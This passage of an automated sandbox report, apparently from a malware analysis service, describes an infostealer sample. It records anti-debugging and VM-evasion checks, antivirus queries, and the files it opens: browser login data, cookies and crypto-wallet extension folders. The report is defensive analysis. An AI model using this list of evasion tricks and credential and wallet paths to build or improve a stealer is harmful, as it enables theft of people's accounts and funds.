          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D005ED second address: 4CF0E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F3824C23D21h 0x0000000f xor eax, eax 0x00000011 jmp 00007F37B450F40Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 cmp esi, 00000000h 0x00000026 setne al 0x00000029 xor ebx, ebx 0x0000002b test al, 01h 0x0000002d jne 00007F37B4535CD7h 0x0000002f jmp 00007F37B4535DDFh 0x00000034 call 00007F37B8E524E0h 0x00000039 mov edi, edi 0x0000003b jmp 00007F37B4535CE3h 0x00000040 xchg eax, ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F37B4535CE0h 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E15 second address: 4CF0E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E19 second address: 4CF0E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E1F second address: 4CF0E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 75B3h 0x00000007 mov ah, BAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F37B45370A7h 0x00000015 mov cx, 6BEFh 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E4B second address: 4CF0E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, FBh 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E5D second address: 4CF0E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E61 second address: 4CF0E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E67 second address: 4CF0E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 7DF14960h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E7B second address: 4CF0E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0E7F second address: 4CF0EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c mov al, A5h 0x0000000e mov bh, CFh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edi, 6A8C3084h 0x00000018 popad 0x00000019 xchg eax, ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0F07 second address: 4CF0F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0F0B second address: 4CF0F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0F0F second address: 4CF0F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0F15 second address: 4CF0F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0F1B second address: 4CF0F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00910 second address: 4D00946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007F37B45370A4h 0x0000000b adc ecx, 00196608h 0x00000011 jmp 00007F37B453709Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00946 second address: 4D0094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0094A second address: 4D0094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0094E second address: 4D00954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00954 second address: 4D00987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F37B45370A0h 0x00000010 cmp dword ptr [7544459Ch], 05h 0x00000017 pushad 0x00000018 mov eax, 30CBAA2Dh 0x0000001d pushad 0x0000001e mov bx, ax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00987 second address: 4D009BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 je 00007F3824C13D48h 0x0000000c jmp 00007F37B4535CE0h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F37B4535CE7h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00A39 second address: 4D00A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F37B453709Bh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F37B45370A5h 0x0000001b mov edx, esi 0x0000001d popad 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 mov edi, esi 0x00000029 popad 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov al, F4h 0x00000030 jmp 00007F37B453709Bh 0x00000035 popad 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A03 second address: 4D10A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A07 second address: 4D10A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A0B second address: 4D10A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A11 second address: 4D10A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F37B45370A0h 0x00000009 sbb esi, 1CA51B28h 0x0000000f jmp 00007F37B453709Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F37B45370A1h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A4F second address: 4D10A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4AE8BDD2h 0x00000008 mov ah, bl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 call 00007F37B4535CDCh 0x00000017 movzx ecx, bx 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ax, dx 0x00000021 mov cx, bx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push esi 0x0000002a pop edx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A84 second address: 4D10A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov dx, 8C92h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, BC51h 0x00000016 mov si, CC8Dh 0x0000001a popad 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10A9F second address: 4D10ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F37B4535CE6h 0x00000010 je 00007F3824C035BFh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10ADA second address: 4D10ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10ADE second address: 4D10AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10AFB second address: 4D10B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F37B45370A8h 0x0000000b add ax, EBC8h 0x00000010 jmp 00007F37B453709Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [7544459Ch], 05h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F37B45370A4h 0x00000027 jmp 00007F37B45370A5h 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F3824C1C9CCh 0x00000034 pushad 0x00000035 mov ch, dh 0x00000037 mov bh, cl 0x00000039 popad 0x0000003a push ebp 0x0000003b pushad 0x0000003c call 00007F37B453709Ah 0x00000041 jmp 00007F37B45370A2h 0x00000046 pop ecx 0x00000047 mov esi, edx 0x00000049 popad 0x0000004a mov dword ptr [esp], esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 mov eax, 590FC5FBh 0x00000057 popad 0x00000058 rdtsc
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3FCB0F instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 626419 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\file.exe TID: 7852 Thread sleep time: -210000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe TID: 7852 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, file.exe, 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
          Source: file.exe, 00000000.00000003.1521304357.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1522746550.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525055106.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524670338.00000000056D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: multipart/form-data; boundary=A8CHGFSQ06VHXG923TMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Keep-Alive
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
          Source: file.exe, 00000000.00000002.1602655677.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
          Source: file.exe, 00000000.00000002.1602655677.0000000001027000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.1522907213.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524670338.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1551144110.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545484064.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521304357.00000000056C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1550281901.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525055106.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521426602.00000000056C9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521591921.00000000056C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: --A8CHGFSQ06VHXG923T
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696497155p
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
          Source: file.exe, 00000000.00000003.1523408821.000000000109D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525293509.000000000109D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521705021.000000000109C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Content-Type: multipart/form-data; boundary=A8CHGFSQ06VHXG923T
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
          Source: file.exe, 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
          Source: file.exe, 00000000.00000003.1521304357.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1522746550.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525055106.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524670338.00000000056D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: multipart/form-data; boundary=A8CHGFSQ06VHXG923T
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
          Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
          Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

          Anti Debugging

          Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exe File opened: NTICE
          Source: C:\Users\user\Desktop\file.exe File opened: SICE
          Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003DDF70 LdrInitializeThunk,0_2_003DDF70
          Source: file.exe, file.exe, 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xZProgram Manager
          Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: file.exe, 00000000.00000003.1551144110.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602655677.0000000001027000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: file.exe, file.exe, 00000000.00000003.1600238733.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546353038.0000000001085000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara match File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
          Source: Yara match File source: sslproxydump.pcap, type: PCAP
          Source: file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/Electrum-LTC
          Source: file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/ElectronCash
          Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: file.exe String found in binary or memory: Wallets/Exodus
          Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe String found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
